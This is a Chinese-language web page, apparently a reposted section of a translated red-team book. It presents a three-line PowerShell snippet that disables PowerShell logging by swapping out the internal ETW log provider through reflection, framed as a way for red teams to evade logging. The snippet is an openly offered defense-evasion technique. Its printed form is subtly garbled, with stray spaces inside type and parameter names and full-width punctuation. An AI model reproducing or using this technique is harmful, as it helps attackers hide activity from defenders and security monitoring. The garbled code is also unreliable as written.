文章来源于网络收集而来,版权归原创者所有,如有侵权请及时联系!
8.5 禁用 PS 记录
作为红队,我们一直在寻找独特的方法,尝试禁用任何类型的日志记录。虽然有一些办法来执行这些攻击,但我们仍在不断寻找新的简单技术。
以下是 leechristensen 的示例,可用于禁用 PowerShell 日志记录。
- $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation. Tracing. PSE twLogProvider').GetField('etwProvider','NonPublic,Static')。
- $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider –Argument List @([Guid]::NewGuid())。
- $EtwProvider.SetValue($null, $EventProvider)。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论